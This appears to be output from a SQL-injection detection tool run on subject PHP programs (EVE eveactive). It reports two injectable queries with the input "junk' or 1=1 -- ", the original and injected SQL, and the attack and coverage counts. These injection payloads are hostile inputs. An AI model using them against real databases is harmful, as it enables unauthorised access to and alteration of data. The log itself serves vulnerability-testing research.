--------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/EVE/eveactive/edit.php vulnerability at line:29 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/EVE/eveactive/edit.php Input: id="junk' or 1=1 -- " NEW: SELECT MemberID, Name, Division, DateJoined, RankCorp, Vacation, Comment, Deleted FROM MembersMain WHERE MemberID='junk' or 1=1 -- ' ORIGINAL: SELECT MemberID, Name, Division, DateJoined, RankCorp, Vacation, Comment, Deleted FROM MembersMain WHERE MemberID='1' ---------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/EVE/eveactive/index.php vulnerability at line:30 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/EVE/eveactive/user.php Input: HTTP_EVE_CHARID="1" HTTP_EVE_CHARNAME="1" HTTP_EVE_CORPNAME="1" HTTP_EVE_TRUSTED="1" HTTP_USER_AGENT="1" page="1" vacedit="junk' or 1=1 -- " NEW: UPDATE MembersMain SET Vacation = 'junk' or 1=1 -- ' WHERE Name = '1' ORIGINAL: UPDATE MembersMain SET Vacation = '1' WHERE Name = '1' attack count:2 coveredSQL:6 coveredTaintedSQL:6